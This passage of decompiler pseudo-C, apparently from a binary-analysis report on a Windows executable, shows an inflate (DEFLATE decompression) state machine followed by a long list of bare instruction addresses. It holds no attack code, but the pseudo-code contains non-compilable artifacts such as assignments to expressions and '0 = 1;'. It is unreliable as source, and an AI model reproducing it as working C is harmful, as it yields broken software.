											 *(0x409394 + __eax * 2) & 0x0000ffff =  *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409394 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409394 + __eax * 2) & 0x0000ffff =  *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406A32( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406A32( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42db38;
												if( *0x42db38 != 0) {
													L22:
													_t412 =  *0x4093b8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x4093bc; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42c9b4; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42c9b0; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42c9b8;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42ce38;
													if(_t416 < 0x42ce38) {
														L15:
														__eflags = _t416 - 0x42cbf4;
														_t438 = 8;
														if(_t416 > 0x42cbf4) {
															__eflags = _t416 - 0x42cdb8;
															if(_t416 >= 0x42cdb8) {
																__eflags = _t416 - 0x42ce18;
																if(_t416 < 0x42ce18) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406A9A(0x42c9b8, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c9b4, 0x4093b8, 0x42d2b8, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42c9b8, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42c9b8 + _t440;
														E00406A9A(0x42c9b8, 0x1e, 0, 0x407408, 0x407444, 0x42c9b0, 0x4093bc, 0x42d2b8, _t448 - 8);
														 *0x42db38 =  *0x42db38 + 1;
														__eflags =  *0x42db38;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405801( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406A32( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409394 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409394 + __eax * 2) & 0x0000ffff =  *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406A9A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406A9A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406A32( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                  0x004062c3
                                  0x004062c3
                                  0x004062c3
                                  0x004062c3
                                  0x004062c3
                                  0x004062c7
                                  0x00000000
                                  0x00000000
                                  0x004062cd
                                  0x004062cd
                                  0x004062d0
                                  0x004062d3
                                  0x004062d8
                                  0x004062da
                                  0x004062dd
                                  0x004062e0
                                  0x004062e3
                                  0x004062e3
                                  0x004062e6
                                  0x00000000
                                  0x00000000
                                  0x004062e8
                                  0x004062e8
                                  0x004062eb
                                  0x004062f0
                                  0x004062f2
                                  0x004062f5
                                  0x004062fb
                                  0x0040605a
                                  0x0040605a
                                  0x0040605d
                                  0x00406063
                                  0x00406069
                                  0x00406072
                                  0x00406078
                                  0x0040607b
                                  0x00406082
                                  0x00406087
                                  0x0040608d
                                  0x00406098
                                  0x00406098
                                  0x00406301
                                  0x00406301
                                  0x0040630b
                                  0x00000000
                                  0x00000000
                                  0x00406311
                                  0x00406311
                                  0x00406315
                                  0x00406318
                                  0x00406318
                                  0x0040631c
                                  0x00406322
                                  0x00406322
                                  0x00406325
                                  0x00406328
                                  0x0040632e
                                  0x00000000
                                  0x00000000
                                  0x00406330
                                  0x00406352
                                  0x00406352
                                  0x00406355
                                  0x00000000
                                  0x00000000
                                  0x00406332
                                  0x00406336
                                  0x00000000
                                  0x00000000
                                  0x0040633c
                                  0x0040633c
                                  0x0040633f
                                  0x00406342
                                  0x00406347
                                  0x00406349
                                  0x0040634c
                                  0x0040634f
                                  0x0040634f
                                  0x00406357
                                  0x00406357
                                  0x0040635d
                                  0x00406360
                                  0x00406363
                                  0x00406363
                                  0x0040636a
                                  0x0040636e
                                  0x00406372
                                  0x00406375
                                  0x00406378
                                  0x0040637e
                                  0x00406383
                                  0x00000000
                                  0x00000000
                                  0x00406385
                                  0x00406399
                                  0x00406399
                                  0x0040639d
                                  0x00000000
                                  0x00000000
                                  0x00406387
                                  0x0040638a
                                  0x0040638a
                                  0x00406391
                                  0x00406396
                                  0x00406396
                                  0x00406396
                                  0x0040639f
                                  0x0040639f
                                  0x004063a2
                                  0x004063b0
                                  0x004063b6
                                  0x004063bb
                                  0x004063c1
                                  0x004063c7
                                  0x004063cd
                                  0x004063d4
                                  0x004063e8
                                  0x004063e8
                                  0x004069b7
                                  0x004069b7
                                  0x004069b7
                                  0x004069bc
                                  0x00000000
                                  0x00000000
                                  0x00405ff4
                                  0x00405ff4
                                  0x00000000
                                  0x004065ef
                                  0x004065ef
                                  0x004065f3
                                  0x004065f6
                                  0x004065f9
                                  0x004065fc
                                  0x00000000
                                  0x00000000
                                  0x00406602
                                  0x00406602
                                  0x00406627
                                  0x00406627
                                  0x00406627
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x00406607
                                  0x00406607
                                  0x0040660b
                                  0x00000000
                                  0x00000000
                                  0x00406611
                                  0x00406611
                                  0x00406614
                                  0x00406617
                                  0x0040661a
                                  0x0040661c
                                  0x0040661e
                                  0x00406621
                                  0x00406624
                                  0x00406624
                                  0x00406624
                                  0x0040662b
                                  0x0040662b
                                  0x00406633
                                  0x00406636
                                  0x00406639
                                  0x0040663c
                                  0x00406640
                                  0x00406643
                                  0x00406645
                                  0x00406648
                                  0x0040664a
                                  0x0040665e
                                  0x0040665e
                                  0x00406661
                                  0x0040667b
                                  0x0040667b
                                  0x0040667e
                                  0x00000000
                                  0x00000000
                                  0x00406684
                                  0x00406684
                                  0x00406687
                                  0x00000000
                                  0x00000000
                                  0x0040668d
                                  0x0040668d
                                  0x00000000
                                  0x0040668d
                                  0x00406663
                                  0x00406666
                                  0x0040666d
                                  0x00406670
                                  0x00000000
                                  0x00406670
                                  0x0040664c
                                  0x00406650
                                  0x00406653
                                  0x00000000
                                  0x00000000
                                  0x00406698
                                  0x00406698
                                  0x004066bd
                                  0x004066bd
                                  0x004066bd
                                  0x004066bf
                                  0x00000000
                                  0x00000000
                                  0x0040669d
                                  0x0040669d
                                  0x004066a1
                                  0x00000000
                                  0x00000000
                                  0x004066a7
                                  0x004066a7
                                  0x004066aa
                                  0x004066ad
                                  0x004066b0
                                  0x004066b2
                                  0x004066b4
                                  0x004066b7
                                  0x004066ba
                                  0x004066ba
                                  0x004066ba
                                  0x004066c1
                                  0x004066c9
                                  0x004066cc
                                  0x004066cf
                                  0x004066d1
                                  0x004066d4
                                  0x004066d4
                                  0x004066d6
                                  0x004066da
                                  0x004066dd
                                  0x004066e0
                                  0x004066e3
                                  0x00000000
                                  0x00000000
                                  0x004066e9
                                  0x004066e9
                                  0x0040670e
                                  0x0040670e
                                  0x0040670e
                                  0x00406710
                                  0x00000000
                                  0x00000000
                                  0x004066ee
                                  0x004066ee
                                  0x004066f2
                                  0x00000000
                                  0x00000000
                                  0x004066f8
                                  0x004066f8
                                  0x004066fb
                                  0x004066fe
                                  0x00406701
                                  0x00406703
                                  0x00406705
                                  0x00406708
                                  0x0040670b
                                  0x0040670b
                                  0x0040670b
                                  0x00406712
                                  0x00406712
                                  0x0040671a
                                  0x0040671d
                                  0x00406720
                                  0x00406723
                                  0x00406727
                                  0x0040672a
                                  0x0040672c
                                  0x0040672f
                                  0x00406732
                                  0x0040674c
                                  0x0040674c
                                  0x0040674f
                                  0x00000000
                                  0x00000000
                                  0x00406755
                                  0x00406755
                                  0x00406758
                                  0x0040675f
                                  0x00000000
                                  0x0040675f
                                  0x00406734
                                  0x00406737
                                  0x0040673e
                                  0x00406741
                                  0x00000000
                                  0x00000000
                                  0x00406767
                                  0x00406767
                                  0x0040678c
                                  0x0040678c
                                  0x0040678c
                                  0x0040678e
                                  0x00000000
                                  0x00000000
                                  0x0040676c
                                  0x0040676c
                                  0x00406770
                                  0x00000000
                                  0x00000000
                                  0x00406776
                                  0x00406776
                                  0x00406779
                                  0x0040677c
                                  0x0040677f
                                  0x00406781
                                  0x00406783
                                  0x00406786
                                  0x00406789
                                  0x00406789
                                  0x00406789
                                  0x00406790
                                  0x00406798
                                  0x0040679b
                                  0x0040679e
                                  0x004067a0
                                  0x004067a3
                                  0x004067a3
                                  0x004067a5
                                  0x00000000
                                  0x00000000
                                  0x004067ab
                                  0x004067ab
                                  0x004067ae
                                  0x004067b3
                                  0x004067b5
                                  0x004067bb
                                  0x004067bd
                                  0x004067d2
                                  0x004067d4
                                  0x004067d4
                                  0x004067bf
                                  0x004067c5
                                  0x004067c7
                                  0x004067c9
                                  0x004067c9
                                  0x004067d6
                                  0x004067da
                                  0x004067dd
                                  0x004067e3
                                  0x004067e3
                                  0x004067e6
                                  0x004067e6
                                  0x004067e6
                                  0x004067e8
                                  0x00000000
                                  0x00000000
                                  0x004067ee
                                  0x004067ee
                                  0x004067f4
                                  0x004067f6
                                  0x0040681b
